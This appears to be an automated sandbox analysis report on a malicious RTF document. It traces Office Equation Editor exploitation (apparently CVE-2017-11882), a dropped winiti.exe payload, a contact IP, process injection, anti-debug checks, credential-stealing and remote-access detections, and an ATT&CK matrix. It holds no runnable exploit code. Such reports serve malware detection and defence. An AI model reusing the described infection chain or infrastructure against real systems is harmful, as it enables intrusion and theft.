                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W4Drl4TO37y97JWKtA.csHigh entropy of concatenated method names: 'Dispose', 'IoK35TohUO', 'dpjJLlOJ9L', 'kQRKKgqWcH', 'gHF3GF3xSa', 'raU3zpcFtC', 'ProcessDialogKey', 'XERJYWowes', 'DpjJ35479m', 'Y3RJJQXD9y'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, GXYba2YoMQG9XKKBvl.csHigh entropy of concatenated method names: 'ubhs8yexla', 'FJGsWAcVyA', 'xnnsD82CGA', 'MjWs1jMqoD', 'NK7sguDqbQ', 'QHisrp9d4N', 'fgnshtkjEl', 'NxpspaEamv', 'm52slv2U4T', 'SbEsURbKbR'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, rHxnfv6Sf3LHXLbEDN.csHigh entropy of concatenated method names: 'aZ3gfA2H4y', 'VKEgxirfWt', 'X0ZgCX1bvr', 'zT3g4hwbaM', 'eQigLZGBoy', 'JbjgwJarVa', 'CpCgBlaC7Q', 'nYUgQg5SNc', 'u1ygINVLGh', 'RltgyRc9sr'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, Eil6R8trbmXLNBHNuy.csHigh entropy of concatenated method names: 'mdcxj9UD4ZfGMsOqg4u', 'ML04rsUtbCB8poGaqhm', 'riAPpKVKfA', 'lKGPlQqeOQ', 'HkwPUY2JFn', 'VuIkxIUG0kx9T58IVDd', 'kFedhRUPXY0is8rO78b'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, Iyof3xLt5ZRIW115jV.csHigh entropy of concatenated method names: 'kdvpV4B7hw', 'OOVpXnRvPT', 'n9cpsAqFpC', 'jBmpu0lT2h', 'POQpPXiGii', 'xQppaM7Y94', 'RrTp631cLq', 'YW7pndJMuP', 't2lpjgmutN', 'tlEpAJcQFJ'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, ypaX1MoG8LqZAomX1h.csHigh entropy of concatenated method names: 'iUsmD0Wbv1', 'Gy6m1CbjAB', 'bB5mFu1XcP', 'O02mLfIvrT', 'dmZmBhckm6', 'UghmQocMCc', 'tfImyLe2cb', 'UlbmvKWonI', 'RoSmfsucrk', 'veWm0nNgKB'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, KTv2InajnNoxY4E9Rd.csHigh entropy of concatenated method names: 'RTAhjP8qxY', 'DJLhAd1soQ', 'ToString', 'EmshVltPQM', 'M9ihXvN6Aj', 'arohs2yJBr', 'GCLhu8PtuH', 'MKBhPbEZVy', 'v1vha07xgC', 'W8mh6Lmjm2'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, nVct438kgTuAYGVuDt.csHigh entropy of concatenated method names: 'dsyXCJ0UkE', 'vibX4Bafga', 'TJhXdPevij', 'L10XR0cLol', 'GZVXtyLeOy', 'sfZXMPY3Yx', 'Q56XHvxXKK', 'ko9XNVxS0m', 'nkiX5hNRS2', 'RVtXGJCWKH'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, msCl8PRUvFWMD9tfMcE.csHigh entropy of concatenated method names: 'WRRlZWrtak', 'JZ4l2ZBqcr', 'GjClcT3TwS', 'VAjl8Lxskp', 'AIXl953Na7', 'kkPlWvTvbU', 'vqclSXhtIP', 'WqWlDw97hZ', 'uShl13g10D', 'hOLlOkHiR0'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, zxyfQhlGRkA29DlFf0.csHigh entropy of concatenated method names: 'cs9l3g4YWl', 'GmpleImVL0', 'nb3lo5h3p2', 'N4ulVRw5iJ', 'L8ylX4yt1r', 'qg6luxFV2M', 'qAblP9sDLO', 'VZYpHNg4nF', 'seLpNegVPF', 'asRp51FiNB'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W9IPWAqr0MPYr1VvVo.csHigh entropy of concatenated method names: 'ob7ekgbvlw', 'S6beVLwqgn', 'BL8eXVgohH', 'mS4esF7ESR', 'zKReum5ndl', 'GuKePYyPtM', 'sYCea3vm2x', 'CNLe6U93Gd', 'jPUen8uyCf', 'GFhejiyNcM'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, HKRKTgmgtv8UpWFG4L.csHigh entropy of concatenated method names: 'VqRaVuy3I3', 'nuCasepv50', 'C4SaPusZJx', 'ic7PGZ1NOF', 'FIGPzE4K6K', 'T1IaYJD7cQ', 'chNa3wR8ZF', 'SfSaJKrTBw', 'L75ae2JsZC', 'HnBaoqWiOw'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, gpIaQEFaQE9fYaXf6e.csHigh entropy of concatenated method names: 'wQOPk9kstW', 'BZlPXNs14N', 'fVwPuR8M5b', 'FhWPapVJ0D', 'snnP6g7eSw', 'xkvutMNLZ8', 'KGOuM2v4gP', 'DxLuH4OqDX', 'QjyuN5KtUJ', 'eI8u5Fdfj7'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, IFh7DVzobfxWABMarZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jD9lmmbE46', 'YcolgyxY57', 'rnSlrwoFRU', 'qRNlheZBqp', 'S1NlpSP1iM', 'ARllleQd8r', 'GQflUXAlUv'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, VqE1uksyKtqyCUTeoW.csHigh entropy of concatenated method names: 'OZepFNKa63', 'wM9pLVmaRq', 'fRLpwEcMtB', 'sxIpBk5vyi', 'f0gpCjXGM4', 'EEDpQvW3EV', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, iywWJ6hAJcl2siLDcZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pkVJ5i3Vb1', 'bZrJGW8hEF', 'Wl3Jz0MIQO', 'AaFeYwq38k', 'znYe3pEYhj', 'eKCeJ7R9JI', 'yXxeebd3Nu', 'yq7FgWHUgUkJkmYGC5X'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 1EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 7AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 6440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 8AD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 6620000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A00101 rdtsc 9_2_00A00101
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1392Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 1292Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 2156Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2736Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A00101 rdtsc 9_2_00A00101
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00417763 LdrLoadDll,9_2_00417763
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A0080 mov ecx, dword ptr fs:[00000030h]9_2_009A0080
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A00EA mov eax, dword ptr fs:[00000030h]9_2_009A00EA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009C26F8 mov eax, dword ptr fs:[00000030h]9_2_009C26F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.winiti.exe.460000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.460000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.21938ac.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.21938ac.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.372607440.0000000000460000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372745641.0000000002171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.411080065.0000000000080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.411140911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.winiti.exe.460000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.460000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.21938ac.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.winiti.exe.21938ac.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.372607440.0000000000460000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372745641.0000000002171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts32
                Exploitation for Client Execution
                1
                DLL Side-Loading
                111
                Process Injection
                1
                Masquerading
                OS Credential Dumping12
                Security Software Discovery
                Remote Services11
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media12
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS1
                Remote System Discovery
                Distributed Component Object ModelInput Capture21
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1485301 Sample: YjYoFznWQI.rtf Startdate: 31/07/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 15 other signatures 2->46 8 WINWORD.EXE 291 13 2->8         started        process3 process4 10 EQNEDT32.EXE 12 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 32 104.219.239.104, 49163, 80 DATAWAGONUS United States 10->32 28 C:\Users\user\AppData\Roaming\winiti.exe, PE32 10->28 dropped 30 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 10->30 dropped 48 Office equation editor establishes network connection 10->48 50 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->50 17 winiti.exe 1 7 10->17         started        file6 signatures7 process8 signatures9 34 Multi AV Scanner detection for dropped file 17->34 36 Machine Learning detection for dropped file 17->36 38 Injects a PE file into a foreign processes 17->38 20 winiti.exe 17->20         started        22 winiti.exe 17->22         started        24 winiti.exe 17->24         started        26 winiti.exe 17->26         started        process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.